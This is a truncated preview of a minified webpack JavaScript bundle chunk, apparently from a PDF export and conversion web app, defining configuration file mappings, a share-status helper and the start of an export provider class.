                  Preview:"use strict";(self["webpackJsonp-conversions2"]=self["webpackJsonp-conversions2"]||[]).push([[160],{zPdz:(e,t,r)=>{r.r(t),r.d(t,{default:()=>f});var s=r("plsW"),o=r("oKgt"),n=r("0Lu5");const a={createpdf_options:"createpdf_options_v1.json",createpdf_parameters:"createpdf_parameters_v1.json",exportpdf_options:"exportpdf_options_v1.json",exportpdf_parameters:"exportpdf_parameters_v1.json",new_asset_job_v1:"new_asset_job_v1.json",pdf_actions_parameters:"pdf_actions_parameters_v1.json"};var i=r("Ac5s");const utils_isOldShare=async e=>{const{assetForOperation:t,childJobIds:r}=e;if(t&&t.parcel_id&&!t.is_original_shared)return!0;const o=await s.providers["lifecycle-progress"]();return void 0!==r.map((e=>o.getJobById(e))).find((e=>{const{assetForOperation:t}=e;return t&&t.parcel_id&&!t.is_original_shared}))};var c,p=r("KAUC"),d=r("2nrG");const{EXPORT_PDF:l}=o.VerbNames;let _,v;class ExportPdfProvider{constructor(){var e=this;this.ready=async()=>{var e;this.analyticsUtil=new d.ZP(d.zW.workflows
                  No static file info